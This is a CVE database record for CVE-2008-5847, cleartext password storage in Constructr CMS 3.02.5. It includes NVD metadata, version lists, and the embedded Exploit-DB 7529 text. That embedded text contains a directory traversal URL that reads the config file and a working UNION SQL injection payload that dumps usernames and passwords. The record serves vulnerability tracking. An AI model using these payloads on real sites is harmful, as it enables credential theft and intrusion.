ID CVE-2008-5847
Type cve
Reporter NVD
Modified 2017-09-28T21:32:50
Description
Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column (the column is named "hash" but holds the password itself, not a digest of it).
{"id": "CVE-2008-5847", "bulletinFamily": "NVD", "title": "CVE-2008-5847", "description": "Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.", "published": "2009-01-05T15:30:02", "modified": "2017-09-28T21:32:50", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5847", "reporter": "NVD", "references": ["https://www.exploit-db.com/exploits/7529", "http://securityreason.com/securityalert/4868"], "cvelist": ["CVE-2008-5847"], "type": "cve", "lastseen": "2017-09-29T14:26:16", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:constructr:constructr-cms:3.01.0:beta", "cpe:/a:constructr:constructr-cms:3.02.4", "cpe:/a:constructr:constructr-cms:3.01.2:beta", "cpe:/a:constructr:constructr-cms:3.02.5", "cpe:/a:constructr:constructr-cms:3.01.8:beta", "cpe:/a:constructr:constructr-cms:3.02.2", "cpe:/a:constructr:constructr-cms:3.01.4:beta", "cpe:/a:constructr:constructr-cms:3.01.1:beta", "cpe:/a:constructr:constructr-cms:3.01.6:beta", "cpe:/a:constructr:constructr-cms:3.02.1", "cpe:/a:constructr:constructr-cms:3.01.7:beta", "cpe:/a:constructr:constructr-cms:3.01.3:beta", "cpe:/a:constructr:constructr-cms:3.00.2:alpha", "cpe:/a:constructr:constructr-cms:3.01.5:beta", "cpe:/a:constructr:constructr-cms:3.00.1:alpha", "cpe:/a:constructr:constructr-cms:3.01.9:beta", "cpe:/a:constructr:constructr-cms:3.02.0", "cpe:/a:constructr:constructr-cms:3.02.3", "cpe:/a:constructr:constructr-cms:3.00.0:alpha"], "cvelist": ["CVE-2008-5847"], "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "description": "Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive 
information by reading the hash column.", "edition": 1, "enchantments": {}, "hash": "c240be69b3b87bc22203c7f242e1f8ae55aea15a1d4a044eb7e7d4cb16fbfbf5", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "f74cca08c49dc82159c02030808e37ab", "key": "published"}, {"hash": "4199bae72fe3b7198d2ebeee9399fb08", "key": "modified"}, {"hash": "6cef4c2b4938ed9e4e4b99bc94233850", "key": "cvss"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "1c8d22a3d089a58747800607567dbf01", "key": "references"}, {"hash": "d9d61ae50041e0489a51921722af72df", "key": "cvelist"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "544f424b8761d2f783a28d27288b2562", "key": "cpe"}, {"hash": "4f2341c2d023395cc5f58f1f75ad39de", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "4a7a7bd150616f20aabb12b7ce6be050", "key": "href"}, {"hash": "0d94f42244a51afde4ffb87bff5fef1b", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5847", "id": "CVE-2008-5847", "lastseen": "2016-09-03T11:31:39", "modified": "2009-01-29T02:00:27", "objectVersion": "1.2", "published": "2009-01-05T15:30:02", "references": ["http://www.milw0rm.com/exploits/7529", "http://securityreason.com/securityalert/4868"], "reporter": "NVD", "scanner": [], "title": "CVE-2008-5847", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T11:31:39"}], "edition": 2, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "544f424b8761d2f783a28d27288b2562"}, {"key": "cvelist", "hash": "d9d61ae50041e0489a51921722af72df"}, {"key": "cvss", "hash": "6cef4c2b4938ed9e4e4b99bc94233850"}, {"key": "description", "hash": 
"4f2341c2d023395cc5f58f1f75ad39de"}, {"key": "href", "hash": "4a7a7bd150616f20aabb12b7ce6be050"}, {"key": "modified", "hash": "7f5f1bc2b1915829b2cde3a3e6f84724"}, {"key": "published", "hash": "f74cca08c49dc82159c02030808e37ab"}, {"key": "references", "hash": "4dd56a1e3f356a4b4fe71634fbee8953"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "0d94f42244a51afde4ffb87bff5fef1b"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "29716e0eb660cdf41ac6c5f29e55e36623480a25980314aa75e0e03297dbe1b2", "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2017-09-29T14:26:16"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:7529"]}], "modified": "2017-09-29T14:26:16"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "cpe": ["cpe:/a:constructr:constructr-cms:3.01.0:beta", "cpe:/a:constructr:constructr-cms:3.02.4", "cpe:/a:constructr:constructr-cms:3.01.2:beta", "cpe:/a:constructr:constructr-cms:3.02.5", "cpe:/a:constructr:constructr-cms:3.01.8:beta", "cpe:/a:constructr:constructr-cms:3.02.2", "cpe:/a:constructr:constructr-cms:3.01.4:beta", "cpe:/a:constructr:constructr-cms:3.01.1:beta", "cpe:/a:constructr:constructr-cms:3.01.6:beta", "cpe:/a:constructr:constructr-cms:3.02.1", "cpe:/a:constructr:constructr-cms:3.01.7:beta", "cpe:/a:constructr:constructr-cms:3.01.3:beta", "cpe:/a:constructr:constructr-cms:3.00.2:alpha", "cpe:/a:constructr:constructr-cms:3.01.5:beta", "cpe:/a:constructr:constructr-cms:3.00.1:alpha", "cpe:/a:constructr:constructr-cms:3.01.9:beta", "cpe:/a:constructr:constructr-cms:3.02.0", "cpe:/a:constructr:constructr-cms:3.02.3", "cpe:/a:constructr:constructr-cms:3.00.0:alpha"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"exploitdb": [{"lastseen": "2016-02-01T03:25:56", "bulletinFamily": "exploit", "description": "Constructr CMS <= 3.02.5 Stable Multiple Remote Vulnerabilities. CVE-2008-5847,CVE-2008-5859,CVE-2008-5860. Webapps exploit for php platform", "modified": "2008-12-19T00:00:00", "published": "2008-12-19T00:00:00", "id": "EDB-ID:7529", "href": "https://www.exploit-db.com/exploits/7529/", "type": "exploitdb", "title": "constructr CMS <= 3.02.5 stable Multiple Vulnerabilities", "sourceData": "Constructr CMS\nhttp://constructr-cms.org/\n\n- <= 3.02.5 \"Stable\" -\n\nmagic_quotes_gpc = Off\nregister_globals = On\n\n- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -\nhttp://site/constructr/backend/template.php?edit_file=\n\nDb info:\n../config/config.inc.php\n\n\n- SQL -\nhttp://site/constructr/?show_page=\n\nUser (urlencode) :\n-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML\n\"Hash\" is the password, not really encrypted...\n\n\n- Timeline -\nAuthor notified: Dec 12\nPublic Disclosure: Dec 19\n\n\n- Seasons Greetings -\n- http://nukeit.org -\n\n# milw0rm.com [2008-12-19]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7529/"}]}